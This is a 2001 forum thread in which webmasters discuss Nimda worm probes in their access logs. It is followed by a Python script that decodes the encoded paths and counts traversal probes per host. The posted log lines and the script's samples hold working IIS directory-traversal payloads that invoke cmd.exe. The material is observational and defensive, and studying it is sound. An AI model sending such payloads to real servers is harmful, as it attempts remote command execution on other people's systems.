
Forum Moderators: DixonJones & mademetop


1200 logs in 12h

Why is that?

     

marcello

4:08 pm on Sep 18, 2001 (gmt 0)

10+ Year Member



I think they try to get info, but I am running Linux...
<code>
216.191.176.126 - - [18/Sep/2001:09:02:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:43 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:44 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:45 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:47 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:52 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:54 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284
216.191.176.126 - - [18/Sep/2001:09:02:55 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
216.191.176.126 - - [18/Sep/2001:09:02:56 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106
</code>

mark_roach

4:24 pm on Sep 18, 2001 (gmt 0)

10+ Year Member



Marcello

Looks like it could be some type of virus. It is being discussed here:

[webmasterworld.com...]

I am also seeing it in my logs.

skirril

4:38 pm on Sep 30, 2001 (gmt 0)

10+ Year Member



AFAIK this is the so-called Nimda worm.
As can be seen, it tries to execute some shell on winnt/win2k/win xp?, using a hole in the MS IIS.

Apache is not vulnerable, afaik (except to the heavy loss of bandwidth).
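An added example, not code from the thread or its posters: a log triage script that normalizes the encoded paths shown in the first post (double percent-encoding, malformed `%%` escapes, overlong two-byte sequences) and counts traversal probes per source host. The function names and the lenient overlong-byte folding are assumptions of this example. The first five sample lines are copied from the post above and the last one is constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Common Log Format: host ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) ')
# Two-byte sequences with lead byte 0xC0/0xC1 (overlong encodings of ASCII).
OVERLONG_RE = re.compile(rb"[\xc0\xc1][\x00-\xff]")

def _fold(m):
    # Assumption: model a lenient decoder that does not check the second byte.
    lead, cont = m.group()
    return bytes([(lead & 0x1F) << 6 | (cont & 0x3F)])

def normalize(path, max_rounds=4):
    """Percent-decode until stable, fold overlong bytes, unify separators."""
    data, rounds = path.encode("latin-1", "replace"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    data = OVERLONG_RE.sub(_fold, data)
    return data.replace(b"\\", b"/").lower().decode("latin-1"), rounds

def classify(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    host, target, status = m.groups()
    path, rounds = normalize(target.partition("?")[0])
    return {"host": host, "status": int(status), "path": path, "rounds": rounds,
            "probe": "../" in path and path.endswith("cmd.exe")}

def summarize(lines):
    """Per host: number of probes, and how many were not answered 4xx/5xx."""
    out = defaultdict(lambda: {"probes": 0, "served": 0})
    for rec in filter(None, map(classify, lines)):
        if rec["probe"]:
            out[rec["host"]]["probes"] += 1
            out[rec["host"]]["served"] += rec["status"] < 400
    return dict(out)

SAMPLE = [  # first five copied from the post above; the last line is constructed
    '216.191.176.126 - - [18/Sep/2001:09:02:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106',
    '216.191.176.126 - - [18/Sep/2001:09:02:46 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106',
    '216.191.176.126 - - [18/Sep/2001:09:02:48 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106',
    '216.191.176.126 - - [18/Sep/2001:09:02:53 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 284',
    '216.191.176.126 - - [18/Sep/2001:09:02:55 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 106',
    '192.0.2.10 - - [18/Sep/2001:09:03:00 -0400] "GET /index.html HTTP/1.0" 200 1043',
]
```

A nonzero `served` count for a host is the case worth investigating first, since it means a probe was answered with something other than an error status.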
